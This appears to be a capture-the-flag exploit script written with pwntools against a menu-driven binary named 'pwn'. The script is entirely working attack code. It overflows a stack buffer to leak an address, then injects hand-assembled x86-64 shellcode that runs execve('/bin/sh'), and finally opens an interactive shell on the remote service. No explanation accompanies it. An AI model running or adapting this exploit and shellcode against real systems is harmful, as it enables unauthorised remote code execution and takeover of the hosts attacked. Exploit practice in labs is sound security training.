1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44
| from pwn import *
#elf = ELF('./pwn') #libc = elf.libc #/lib/x86_64-linux-gnu/libc-2.23.so
context(arch = 'amd64', os = 'linux')
def exp(IP, PORT): p = remote(IP, PORT) #p = process('./pwn') p.sendlineafter('Enter your choice:\n', '3') payload1 = 'a'*0x28 + p64(0x12345678) + 'qqqq' + p64(0x400809) p.sendafter('What?', payload1) p.sendlineafter('Enter your choice:\n', '2') p.recvuntil('It is magic: [0x') stack = int(p.recvn(12), 16) #log.success(hex(stack)) shellcode_addr = stack shellcode = "" #shellcode += asm('push 0') shellcode += asm('mov dword ptr [rsp], 0x6e69622f') shellcode += asm('mov dword ptr [rsp+4], 0x0068732f') shellcode += asm('mov rdi, rsp') shellcode += asm('xor rsi, rsi') shellcode += asm('xor rdx, rdx') shellcode += asm('xor rax, rax') shellcode += asm('mov rax, 59') shellcode += asm('syscall') payload2 = shellcode.ljust(0x38, '\0') + p64(shellcode_addr) #gdb.attach(p, 'b *0x400881\nb *0x400896') p.sendlineafter('Enter your choice:\n', '3') p.sendafter('What?', payload2) #print hex(len(shellcode)) p.sendlineafter('Enter your choice:\n', 'a') return p if __name__ == '__main__': p = exp('127.0.0.1', 9527) p.interactive() # 2f 62 69 6e 2f 73 68/bin/sh #//bin/sh
|